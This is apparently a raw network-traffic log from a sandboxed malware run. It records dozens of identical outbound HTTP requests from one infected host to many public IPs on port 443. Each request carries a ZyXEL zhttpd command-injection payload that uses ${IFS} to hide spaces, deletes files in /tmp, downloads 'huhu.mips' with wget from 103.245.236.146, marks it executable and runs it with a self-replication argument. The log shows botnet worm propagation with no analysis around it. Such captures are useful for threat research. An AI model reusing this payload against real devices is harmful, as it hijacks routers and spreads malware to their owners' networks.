                                              Jan 29, 2024 07:03:42.871083021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2754192.168.2.1436614192.184.74.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871149063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2755192.168.2.143882847.45.105.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871177912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2756192.168.2.14589422.228.116.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871222973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2757192.168.2.1439496185.83.75.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871251106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2758192.168.2.1443948156.223.46.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871299028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2759192.168.2.1437788106.23.239.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871326923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2760192.168.2.145665871.70.214.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871364117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2761192.168.2.1433180173.145.16.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871411085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2762192.168.2.1436818140.35.252.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871445894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2763192.168.2.1447700137.114.186.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871499062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2764192.168.2.1459610207.199.17.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871531010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2765192.168.2.1456848194.220.34.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871560097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2766192.168.2.1452280210.135.13.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871601105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2767192.168.2.144091850.238.47.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871618986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2768192.168.2.144050425.94.150.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871655941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2769192.168.2.1437888200.10.29.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871700048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2770192.168.2.1436394162.20.101.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871731997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2771192.168.2.1453516190.43.209.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871757030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2772192.168.2.1436430123.228.32.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871804953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2773192.168.2.1458710112.83.213.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871855021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2774192.168.2.1458858177.142.177.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871886015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2775192.168.2.1452076158.38.250.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871941090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2776192.168.2.143775867.105.21.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871968031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2777192.168.2.144864265.189.203.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871989012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2778192.168.2.145782869.232.114.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.872061968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2779192.168.2.145276845.129.111.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883800983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2780192.168.2.144185438.39.166.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883840084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2781192.168.2.146055664.56.126.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883887053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2782192.168.2.1460456149.162.45.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883915901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2783192.168.2.1438682121.103.139.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883941889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2784192.168.2.1446840110.218.73.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.883975983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2785192.168.2.143397886.15.121.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884008884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2786192.168.2.1434044156.179.1.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884078026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2787192.168.2.1450116203.82.156.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884099007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2788192.168.2.144980475.240.106.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884145021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2789192.168.2.1441396177.240.26.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884200096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2790192.168.2.1445752182.8.62.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884231091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2791192.168.2.1453994119.76.90.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884263992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2792192.168.2.1444396141.228.148.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884291887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2793192.168.2.1442174150.200.241.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884332895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2794192.168.2.1439534189.96.100.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884387016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2795192.168.2.1447528216.157.21.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884394884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2796192.168.2.1436578174.224.49.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884412050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2797192.168.2.1456724209.145.119.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884459972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2798192.168.2.14524241.148.129.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884478092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2799192.168.2.145718478.44.127.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884520054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2800192.168.2.1458292125.199.120.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884560108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2801192.168.2.1451128110.110.213.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884622097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2802192.168.2.144119818.118.47.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884656906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2803192.168.2.1453928199.30.192.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884700060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2804192.168.2.144389440.224.210.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884742975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2805192.168.2.1433076169.177.137.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884767056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2806192.168.2.1440816124.8.242.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884813070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2807192.168.2.1442032140.96.112.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884862900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2808192.168.2.144710087.190.100.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884895086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2809192.168.2.1440404142.168.123.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884932041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2810192.168.2.145495275.191.235.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.884975910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2811192.168.2.145806863.236.231.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885015011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2812192.168.2.1449138144.150.202.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885039091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2813192.168.2.1444006108.160.223.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885080099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2814192.168.2.144559440.140.156.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885113955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2815192.168.2.1449514172.216.167.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885162115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2816192.168.2.145334875.184.84.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.885201931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2817192.168.2.144192644.41.31.179443
                                              TimestampBytes transferredDirectionData
